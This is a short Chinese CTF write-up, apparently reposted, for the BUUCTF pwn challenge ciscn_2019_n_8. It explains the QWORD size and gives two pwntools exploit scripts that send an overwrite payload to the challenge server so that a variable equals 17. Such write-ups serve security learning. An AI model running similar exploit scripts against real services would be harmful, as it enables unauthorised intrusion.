[BUUCTF-pwn]——ciscn_2019_n_8
生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn]——ciscn_2019_n_8
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
[BUUCTF-pwn]——ciscn_2019_n_8
- 題目地址:https://buuoj.cn/challenges#ciscn_2019_n_8
- 題目
上去checksec一下,嚇一跳保護基本全開了。
在IDA中一看,開心了。如此簡單 只需要v[13] ==17 就好。因為var是以字符串的形式輸入的。所以exploit如下:
exploit
from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 + p32(0x11)) p.interactive()發現不可以, 點不開 _QWORD 就去百度了一下
qword全稱是Quad Word。2個字節就是1個Word(1個字,16位),q就是英文quad-這個詞根(意思是4)的首字母,所以它自然是word(2字節,0~2^16-1)的四倍,8字節
所以expoit改下應該為
或者
from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 + p32(0x11) + p32(0)) # 32對應4個字節, 64對應8個字節 p.interactive()總結
以上是生活随笔為你收集整理的[BUUCTF-pwn]——ciscn_2019_n_8的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: [BUUCTF-pwn]——ciscn_
- 下一篇: [BUUCTF-pwn]——jarvis